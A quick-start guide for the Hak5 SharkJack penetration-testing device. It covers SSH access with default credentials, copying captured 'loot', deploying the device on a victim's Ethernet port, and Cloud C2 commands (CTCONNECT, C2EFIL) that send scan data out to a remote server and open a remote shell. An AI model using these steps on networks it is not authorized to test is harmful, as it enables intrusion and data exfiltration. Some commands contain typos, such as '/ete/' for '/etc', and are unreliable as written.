A Quick-Start Guide for the Hak5 SharkJack, a portable network attack tool
Access the SharkJack
- Switch to Arming Mode (center), and connect to PC via Ethernet
- Find the IP: Default is
172.16.24.1
, runifconfig
to check - Login:
ssh [email protected]
, using passwordhak5shark
- On first setup, change the default password, run
passwd
Navigating the SharkJack
- The active payload is located at:
~/payload/payload.sh
- Captured loot is stored with the
~/loot/...
directory - To save all loot locally, run:
scp -r [email protected]:/root/loot/* .
- To upload a new payload, run
scp payload.sh [email protected]:/root/payload/
Conducting an Attack
- Flip into Attack Mode (fully forward), and wait for LED to go magenta
- Plug device into victim Ethernet port, watch LED's blink
- Once LED turns off, unplug device and switch to off
Out-of-the box, the ShakJack comes with an nmap payload, useful for initial network reconnaissance
Additional Tools
CLI Helper Tool
The SharkJack Helper a CLI tool for carrying out common tasks:
Get a shell, push a payload, grab saved loot and upgrade the firmware etc
- Download from: https://downloads.hak5.org/shark
- Make executable:
chmod +x sharkjack.sh
- Run
./sharkjack.sh
, and follow on-screen prompts
Web Interface
Once the firmware has been updated (V1.01 and newer), you can access the SharkJack's web interface by visiting 172.16.24.1 in your browser. From here you can view and modify the current payload, download your loot and view device status
Cloud C2
- Download and run Cloud C2 for your system, from https://shop.hak5.org/products/c2
- Go to Add Device --> SharkJack. Then select the listing --> Setup, and config file will download
- The
device.config
needs to be uploaded to/etc
. Runscp device.config [email protected]:/ete/
- To connect, run
CTCONNECT
. Back on the web interface, your now able to open a shell, for remote access! - To get the loot, run
C2EFIL STRING /root/loot/nmap/nmap-scan_1.txt nmap
, data now will show up in Loot tab!
Note that it the SharkJack does not connect to CloudC2 automatically, but by using the CTCONNECT
and C2EFIL ..
commands to your payload, you'll be able to exfiltrate the loot immediately, and access it remotely.
Reference Info
Switch Positions
- Back: Off/ Charging
- Middle: Arming Mode
- Front: Attack Mode
LET Lights
- Green (blinking): Booting up
- Blue (blinking): Charging
- Blue (solid): Fully Charged
- Yellow (blinking): Arming Mode
- Red (blinking): Error / No Payload
Individual Payloads have their own LED routines, but usually:
Red: Setup, Amber: Scanning, Green: Finished
Specifications
- OS: OpenWRT 19.07-based GNU/Linux
- SoC: 580MHz MediaTek MT7628DAN mips CPU
- MEMORY: 64 MB DDR2 RAM, 64 MB SPI Flash
- IO: RJ45 IEEE 802.3 Ethernet + USB-C charge port
- DIMENSIONS: 62 x 21 x 12 mm
- POWER: 2.5W (USB 5V 0.5A)
- BATTERY: 1S 401020 3.7V 50mAh 0.2W LiPo
- BATTERY TIMES: ~15 mins run, ~7 mins charge
- TEMP: Operating- 35ºC ~ 45ºC, Storage -20ºC ~ 50ºC
- RELATIVE HUMIDITY: 0% to 90% (noncondensing)